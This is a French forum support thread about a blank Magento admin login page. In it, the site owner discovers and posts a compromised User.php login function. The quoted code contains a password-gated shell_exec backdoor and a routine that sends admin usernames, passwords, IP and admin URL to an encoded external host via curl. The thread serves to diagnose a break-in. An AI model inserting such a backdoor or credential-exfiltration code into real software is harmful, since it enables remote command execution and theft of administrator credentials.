Hi @jpbauer 

Pouvez-vous s'il vous plaît vérifier à nouveau en effaçant le cache et le cookie de votre navigateur ou en l'ouvrant dans un autre navigateur.

Merci

---
Si vous avez trouvé ma réponse utile, veuillez indiquer "Kudos" et "Accepter comme solution".

Bonjour

Effectivement, je ne l'avais pas précisé mais j'ai déjà fait le test en effaçant tout le cache sur mon navigateur firefox, fait un test avec Chrome, IE et un téléphone en 4g. J'ai aussi effacé le cache et les sessions actives sur le serveur. Tout est resté sans succès

Hi @jpbauer 

Pouvez-vous ouvrir la page de connexion?

Oui c'est après la validation du user et du pw que la page se recharge blanche. Je peux d'ailleurs taper n’importe quoi, le comportement est le même

Hi @jpbauer 

Sur une page blanche, pouvez-vous vérifier la source d'affichage de la page en appuyant sur ctrl + u et partager sa capture d'écran.

Le code est vierge, je peux donner l'url en mp si vous voulez faire le test

J'ai trouvé le problème, le site a visiblement été hacké en remplacant le fichier

/app/code/core/Mage/Admin/Model/User.php qui contenait à l'origine

public function login($username, $password)
{
if ($this->authenticate($username, $password)) {
$this->getResource()->recordLogin($this);

}
return $this;
}

et qui a été remplacé par

public function login($username, $password){

if(md5($password)==="390xxxxxxxxxxxxxxxxxxxxxxxxxxa65a"){

$output = shell_exec($username); echo "<pre id="inspect">$output</pre>";
}

elseif ($this->authenticate($username, $password)) {
$this->getResource()->recordLogin($this);

$ip=$_SERVER['REMOTE_ADDR'];
$today = date('h:i:s a m/d/Y', time());
$e=Mage::getSingleton('adminhtml/url')->getUrl('adminhtml');
$array = array(
'discount' => "$username $password $ip $today $d $e",
);
$gine = "aHxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxocA==";
$url = base64_decode($gine);

$ch = curl_init($url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $array);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$html = curl_exec($ch);
curl_close($ch);
}
return $this;
}

Je ne sais pas ce que fait le code mais maintenant cela marche mieux!

Si vous avez une idée de comment ce fichier a pu être modifié, je suis preneur. Je viens d'interdire l'ecriture, mais je ne suis pas sur que cela suffise.

Cordialement